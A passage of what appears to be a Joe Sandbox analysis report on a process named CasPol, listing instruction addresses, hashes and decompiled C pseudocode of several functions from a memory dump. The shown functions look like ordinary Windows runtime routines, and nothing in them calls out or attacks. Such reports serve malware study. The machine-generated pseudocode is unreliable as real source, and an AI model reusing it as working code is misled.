				}
			}









































                                                                  0x0141dbe9
                                                                  0x0141dbf2
                                                                  0x0141dbf7
                                                                  0x0141dbf9
                                                                  0x0141dbfc
                                                                  0x0141dc00
                                                                  0x0141dc03
                                                                  0x0141dc14
                                                                  0x0141dd54
                                                                  0x0141dd54
                                                                  0x0141dd54
                                                                  0x0141dc18
                                                                  0x0141dc1d
                                                                  0x0141dc1d
                                                                  0x0141dc32
                                                                  0x0141dc3b
                                                                  0x0141dc3e
                                                                  0x0141dc46
                                                                  0x0141dd5b
                                                                  0x0141dd62
                                                                  0x0141dd64
                                                                  0x0141dd67
                                                                  0x0141dd69
                                                                  0x0141dd6b
                                                                  0x0141dd6e
                                                                  0x0141dd70
                                                                  0x0141dd73
                                                                  0x0141dd73
                                                                  0x00000000
                                                                  0x0141dc4c
                                                                  0x0141dc4e
                                                                  0x01463ae3
                                                                  0x01463ae8
                                                                  0x01463aea
                                                                  0x0141dce7
                                                                  0x0141dce9
                                                                  0x0141dcec
                                                                  0x0141dcee
                                                                  0x0141dcf0
                                                                  0x0141dcf3
                                                                  0x0141dcf5
                                                                  0x01463af2
                                                                  0x01463af5
                                                                  0x01463af5
                                                                  0x0141dd06
                                                                  0x0141dd08
                                                                  0x0141dd0b
                                                                  0x0141dd12
                                                                  0x01463b08
                                                                  0x0141dd18
                                                                  0x0141dd18
                                                                  0x0141dd18
                                                                  0x0141dd20
                                                                  0x0141dd23
                                                                  0x01463b16
                                                                  0x01463b16
                                                                  0x0141dd29
                                                                  0x0141dd2d
                                                                  0x0141dd36
                                                                  0x0141dd40
                                                                  0x0141dd51
                                                                  0x0141dd51
                                                                  0x0141dc54
                                                                  0x0141dc59
                                                                  0x0141dc59
                                                                  0x0141dc5e
                                                                  0x0141dc5e
                                                                  0x0141dc63
                                                                  0x0141dc66
                                                                  0x0141dc6b
                                                                  0x0141dc78
                                                                  0x0141dc7b
                                                                  0x0141dc81
                                                                  0x0141dc81
                                                                  0x0141dc83
                                                                  0x0141dc89
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0141dd7b
                                                                  0x0141dd7b
                                                                  0x0141dc8f
                                                                  0x0141dc8f
                                                                  0x0141dc92
                                                                  0x0141dc99
                                                                  0x0141dc9f
                                                                  0x0141dca5
                                                                  0x0141dcaa
                                                                  0x0141dcaa
                                                                  0x0141dcb3
                                                                  0x0141dcb8
                                                                  0x0141dcbb
                                                                  0x0141dcc1
                                                                  0x0141dccf
                                                                  0x0141dcd2
                                                                  0x0141dcd5
                                                                  0x0141dcd7
                                                                  0x0141dcda
                                                                  0x0141dcdc
                                                                  0x0141dcdc
                                                                  0x0141dce2
                                                                  0x0141dce4
                                                                  0x00000000
                                                                  0x0141dce4

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba39821fc667ef5be31beaf08064fff4bb4a557488a8109bf093b549da4ad79b
                                                                  • Instruction ID: 22eea69ff99347efe40dbedc0a1a9e160326fab167267e6bf242e2e309588f2b
                                                                  • Opcode Fuzzy Hash: ba39821fc667ef5be31beaf08064fff4bb4a557488a8109bf093b549da4ad79b
                                                                  • Instruction Fuzzy Hash: AE51AFB1E00206CFCB14CFA8C484AAEFBF5BB58310F24855BD559A7369EB70A945CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01422990 Relevance: .1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 97%
                                                                  			E01422990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				intOrPtr* _t69;
				intOrPtr _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t82;
				intOrPtr* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				intOrPtr _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x14cff00);
				E0144D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x13d1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = L0143E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x13d1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E014751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x13d166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01422AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = L01406600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = L01422C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								L0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01422AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = L01422C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01422ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0144D0D1(_t62);
				goto L28;
			}





















                                                                  0x01422990
                                                                  0x01422992
                                                                  0x01422997
                                                                  0x014229a3
                                                                  0x014229a6
                                                                  0x014229ab
                                                                  0x014229ad
                                                                  0x014229b2
                                                                  0x01465c80
                                                                  0x014229b8
                                                                  0x014229b8
                                                                  0x014229bb
                                                                  0x014229c0
                                                                  0x014229c5
                                                                  0x014229c6
                                                                  0x014229c6
                                                                  0x014229cb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014229cd
                                                                  0x014229d0
                                                                  0x014229d9
                                                                  0x014229db
                                                                  0x014229dd
                                                                  0x01422a7f
                                                                  0x01422a84
                                                                  0x01422a87
                                                                  0x01422a89
                                                                  0x01465ca1
                                                                  0x01465ca3
                                                                  0x00000000
                                                                  0x01422a8f
                                                                  0x01422a8f
                                                                  0x00000000
                                                                  0x01422a8f
                                                                  0x00000000
                                                                  0x014229e3
                                                                  0x014229e3
                                                                  0x014229e3
                                                                  0x00000000
                                                                  0x014229e3
                                                                  0x014229dd
                                                                  0x00000000
                                                                  0x014229db
                                                                  0x014229e6
                                                                  0x014229e9
                                                                  0x014229eb
                                                                  0x014229ed
                                                                  0x014229f3
                                                                  0x014229f5
                                                                  0x014229f8
                                                                  0x014229fa
                                                                  0x01422a97
                                                                  0x01422a9a
                                                                  0x01422a9d
                                                                  0x01422add
                                                                  0x00000000
                                                                  0x01422a9f
                                                                  0x01422aa2
                                                                  0x01422aa5
                                                                  0x01422aa8
                                                                  0x01422aab
                                                                  0x01465cab
                                                                  0x01465caf
                                                                  0x01465cc5
                                                                  0x01465cda
                                                                  0x01465cdc
                                                                  0x01465cdf
                                                                  0x01465ce5
                                                                  0x00000000
                                                                  0x01465ceb
                                                                  0x01465ced
                                                                  0x01465cee
                                                                  0x00000000
                                                                  0x01465cee
                                                                  0x01465cb1
                                                                  0x01465cb4
                                                                  0x01465cb9
                                                                  0x01465cbb
                                                                  0x00000000
                                                                  0x01465cbd
                                                                  0x01465cbd
                                                                  0x00000000
                                                                  0x01465cbd
                                                                  0x01465cbb
                                                                  0x01422ab1
                                                                  0x01422ab1
                                                                  0x01422ac4
                                                                  0x01422ac6
                                                                  0x01422ac6
                                                                  0x00000000
                                                                  0x01422ac6
                                                                  0x01422aab
                                                                  0x00000000
                                                                  0x01422a00
                                                                  0x01422a09
                                                                  0x01422a0e
                                                                  0x01422a21
                                                                  0x01422a24
                                                                  0x01422a35
                                                                  0x01422a3a
                                                                  0x01422a3d
                                                                  0x01422a42
                                                                  0x01422a59
                                                                  0x01422a59
                                                                  0x01422a5c
                                                                  0x01422a5f
                                                                  0x01422a5f
                                                                  0x014229fa
                                                                  0x014229f3
                                                                  0x01422a64
                                                                  0x01422a64
                                                                  0x01422a6b
                                                                  0x01422a6b
                                                                  0x01422a6d
                                                                  0x01422a72
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8311de58a755ad7a456bccf3f3db42782d6facab81d19977dafa04fc6ce8f461
                                                                  • Instruction ID: 7fc681267c4b308c94434bee20244c70daf23d4bacc4729432afa1d66b8ce223
                                                                  • Opcode Fuzzy Hash: 8311de58a755ad7a456bccf3f3db42782d6facab81d19977dafa04fc6ce8f461
                                                                  • Instruction Fuzzy Hash: BC516A71A0022A9FDF25CF59C840EEEBBB5BF58350F40815AE900AB770C3718992CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01424BAD Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E01424BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				short _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x14ed360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					L013FCC50(_t86);
					L11:
					return L0143B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x14e8504
				E01412280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0143FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0143B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01414620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = L013FCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x14e8504
								L0140FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								L01424F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                  0x01424bad
                                                                  0x01424bbf
                                                                  0x01424bc2
                                                                  0x01424bc6
                                                                  0x01424bcd
                                                                  0x01424bd9
                                                                  0x014667fe
                                                                  0x01466800
                                                                  0x01424ccc
                                                                  0x01424ccd
                                                                  0x01424cb7
                                                                  0x01424cc9
                                                                  0x01424cc9
                                                                  0x01424bdf
                                                                  0x01424be5
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01424beb
                                                                  0x01424bef
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01424bf5
                                                                  0x01424bf9
                                                                  0x01424c06
                                                                  0x01424c0b
                                                                  0x01424c17
                                                                  0x01424c1c
                                                                  0x01424c1f
                                                                  0x01424c25
                                                                  0x01424c33
                                                                  0x01424c3d
                                                                  0x01424c40
                                                                  0x01424c43
                                                                  0x01424c47
                                                                  0x01424c4d
                                                                  0x01424c53
                                                                  0x01424c54
                                                                  0x01424c55
                                                                  0x01424c56
                                                                  0x01424c5b
                                                                  0x01424c5c
                                                                  0x01424c63
                                                                  0x01424c6b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01466776
                                                                  0x01466784
                                                                  0x01466784
                                                                  0x0146679f
                                                                  0x014667a7
                                                                  0x014667af
                                                                  0x014667ce
                                                                  0x00000000
                                                                  0x014667b1
                                                                  0x014667b7
                                                                  0x014667b8
                                                                  0x014667c1
                                                                  0x014667d3
                                                                  0x014667d9
                                                                  0x014667dd
                                                                  0x01424c94
                                                                  0x01424c94
                                                                  0x01424c98
                                                                  0x01424c9c
                                                                  0x01424ca3
                                                                  0x014667f4
                                                                  0x014667f4
                                                                  0x01424cb5
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01424cb5
                                                                  0x01424c79
                                                                  0x01424c7e
                                                                  0x01424c89
                                                                  0x01424c8b
                                                                  0x01424c8f
                                                                  0x01424c8f
                                                                  0x00000000
                                                                  0x01424c89
                                                                  0x014667c3
                                                                  0x00000000
                                                                  0x014667c3
                                                                  0x014667af
                                                                  0x01424c73
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4626acb43f399e88a34e422be6f9f82e7571d556beeb648555dc93db76e5710c
                                                                  • Instruction ID: 1a45f1a4bb39286daaa26af5f131917840e9f58d223f117cbdbdc5ed165843d9
                                                                  • Opcode Fuzzy Hash: 4626acb43f399e88a34e422be6f9f82e7571d556beeb648555dc93db76e5710c
                                                                  • Instruction Fuzzy Hash: F241C631A002299BDB21DF69C940FEA77B8EF55700F4600ABE908AB361D774DE85CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01408A0A Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 94%
                                                                  			E01408A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x14ed360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return L0143B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0140E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x13d1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = L01421DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							L01433C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01408999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                  0x01408a0a
                                                                  0x01408a1c
                                                                  0x01408a23
                                                                  0x01408a2e
                                                                  0x01408a30
                                                                  0x01408a36
                                                                  0x01408a3c
                                                                  0x01408a3e
                                                                  0x01408a4a
                                                                  0x01408a52
                                                                  0x01408a9c
                                                                  0x01408aae
                                                                  0x01408a58
                                                                  0x01408a5e
                                                                  0x01408a6a
                                                                  0x01408a6f
                                                                  0x01408a75
                                                                  0x01408a7d
                                                                  0x01408a85
                                                                  0x01408a86
                                                                  0x01408a89
                                                                  0x01408a93
                                                                  0x01408a99
                                                                  0x01408a9b
                                                                  0x00000000
                                                                  0x01408aaf
                                                                  0x01408abe
                                                                  0x01408ac3
                                                                  0x01408acb
                                                                  0x01408ad7
                                                                  0x01408ae0
                                                                  0x01408af1
                                                                  0x00000000
                                                                  0x01408af1
                                                                  0x01408acd
                                                                  0x01408ad5
                                                                  0x01408afb
                                                                  0x01408afd
                                                                  0x01408aff
                                                                  0x01408b07
                                                                  0x01408b22
                                                                  0x01408b24
                                                                  0x01408b2a
                                                                  0x01408b2e
                                                                  0x01408b3f
                                                                  0x01408b78
                                                                  0x01408b41
                                                                  0x01408b52
                                                                  0x01408b54
                                                                  0x01408b5c
                                                                  0x01408b74
                                                                  0x01408b74
                                                                  0x01408b5c
                                                                  0x01408b3f
                                                                  0x01408b5e
                                                                  0x01408b61
                                                                  0x01408b64
                                                                  0x01408b64
                                                                  0x01408b6c
                                                                  0x01408b6c
                                                                  0x01408b11
                                                                  0x01459cd5
                                                                  0x01459cd5
                                                                  0x01408b17
                                                                  0x01408b1a
                                                                  0x01408b1a
                                                                  0x00000000
                                                                  0x01408ad5
                                                                  0x01408a89

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a60aa188602e62872d95e40961cfaeb93b0eb1a8b9a4d2b421c06b442061de4
                                                                  • Instruction ID: 38618cb6bb8dd469318512e39f458a5163599b7ac6a074ece1b34f34b1866b7e
                                                                  • Opcode Fuzzy Hash: 5a60aa188602e62872d95e40961cfaeb93b0eb1a8b9a4d2b421c06b442061de4
                                                                  • Instruction Fuzzy Hash: B94157B1E0022D9BDB25DF5AC988AAAB7F4EB54300F1045FAD919973A2D7709E81CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014769A6 Relevance: .1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 69%
                                                                  			E014769A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x14ed360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01406C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01476BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01439980() >= 0) {
							E01412280(_t56, 0x14e8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x14e8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x14e8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(L013FB6F0(0x13dc338, 0x13dc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									L01439520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E014395D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					L0140FFB0(_t68, _t77, 0x14e8778);
				}
				_pop(_t78);
				return L0143B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                  0x014769b5
                                                                  0x014769be
                                                                  0x014769c3
                                                                  0x014769c9
                                                                  0x014769cc
                                                                  0x014769d1
                                                                  0x014769d3
                                                                  0x014769de
                                                                  0x014769e1
                                                                  0x014769ea
                                                                  0x014769f6
                                                                  0x014769fe
                                                                  0x01476a13
                                                                  0x01476a14
                                                                  0x01476a15
                                                                  0x01476a16
                                                                  0x01476a1e
                                                                  0x01476a26
                                                                  0x01476a31
                                                                  0x01476a36
                                                                  0x01476a37
                                                                  0x01476a40
                                                                  0x01476a49
                                                                  0x01476a4a
                                                                  0x01476a53
                                                                  0x01476a59
                                                                  0x01476a5d
                                                                  0x01476a5e
                                                                  0x01476a64
                                                                  0x01476a67
                                                                  0x01476a6a
                                                                  0x01476a6d
                                                                  0x01476a70
                                                                  0x01476a77
                                                                  0x01476a7d
                                                                  0x01476a86
                                                                  0x01476a89
                                                                  0x01476a9c
                                                                  0x01476a9f
                                                                  0x01476aa2
                                                                  0x01476aa5
                                                                  0x01476aaf
                                                                  0x01476ab1
                                                                  0x01476ab8
                                                                  0x01476ab9
                                                                  0x01476abb
                                                                  0x01476abe
                                                                  0x01476ac5
                                                                  0x01476ac5
                                                                  0x01476aaf
                                                                  0x01476a40
                                                                  0x01476a26
                                                                  0x014769fe
                                                                  0x01476ace
                                                                  0x01476ad0
                                                                  0x01476ad3
                                                                  0x01476ad8
                                                                  0x01476adf
                                                                  0x01476adf
                                                                  0x01476ae8
                                                                  0x01476aef
                                                                  0x01476aef
                                                                  0x01476af9
                                                                  0x01476b06

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 904a8e6d18c44e36c8b8123c45d475a7c8df642a52875b8b2368d404948aa719
                                                                  • Instruction ID: fd93413876124e8ad67729485fb99f1d53cee76dc9c03a0334a21b571df6ef0f
                                                                  • Opcode Fuzzy Hash: 904a8e6d18c44e36c8b8123c45d475a7c8df642a52875b8b2368d404948aa719
                                                                  • Instruction Fuzzy Hash: 9D41AFB1D006099FEB20DFAAD940BFEBBF5EF58314F14852EE914A7260DB709905CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013F5210 Relevance: .1, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E013F5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E013F52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
